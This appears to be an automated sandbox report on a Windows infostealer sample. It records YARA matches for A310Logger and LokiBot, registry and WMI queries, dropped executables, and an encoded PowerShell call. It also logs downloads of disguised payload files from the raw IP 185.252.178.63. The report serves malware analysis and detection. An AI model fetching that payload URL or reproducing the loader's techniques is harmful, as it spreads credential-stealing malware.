Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/?checkip=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.468843725.0000000001094000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467288810.0000000001094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unpkg.com/leaflet
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openstreetmap.org/copyright
Source: unknown DNS traffic detected: queries for: showip.net
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1sqliteHost: showip.net
Source: global traffic HTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

barindex
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: BPL_1000572_007.bat.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2F288 0_2_00D2F288
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D21019 0_2_00D21019
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2F945 0_2_00D2F945
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2FA90 0_2_00D2FA90
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2FA3A 0_2_00D2FA3A
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2F3CC 0_2_00D2F3CC
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02730040 0_2_02730040
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_027357E0 0_2_027357E0
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02737C50 0_2_02737C50
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02730102 0_2_02730102
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_027304F0 0_2_027304F0
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_0273D5E9 0_2_0273D5E9
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D258C4 0_2_00D258C4
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_03040040 17_2_03040040
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_030457E0 17_2_030457E0
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_0304D5F8 17_2_0304D5F8
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_03040102 17_2_03040102
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_030404F0 17_2_030404F0
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FF282 17_2_031FF282
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FF3CC 17_2_031FF3CC
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FFA3A 17_2_031FFA3A
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FF945 17_2_031FF945
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031F1019 17_2_031F1019
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031F58C4 17_2_031F58C4
Source: BPL_1000572_007.bat.exe Binary or memory string: OriginalFilename vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.479681642.0000000003A8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000000.257250957.00000000005B4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.450440697.0000000002A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.571001353.0000000009A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.478616339.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 0000000D.00000000.436723511.000000000043A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.580085124.00000000010BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe 3BAEBB36220C28C56A692E59E683C77026DAD821CADC377D0D8452D712CCF7A3
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Jump to behavior
Source: BPL_1000572_007.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe "C:\Users\user\Desktop\BPL_1000572_007.bat.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe" Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352 Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Roaming\note Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/16@1/2
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: BPL_1000572_007.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5276
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_01
Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: C*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbpL;@"
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.572590834.0000000000439000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: @@*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbp
Source: BPL_1000572_007.bat.exe String found in binary or memory: Maggopfhjwohttp://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/ d/_CorExeMainmscoree.dll
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
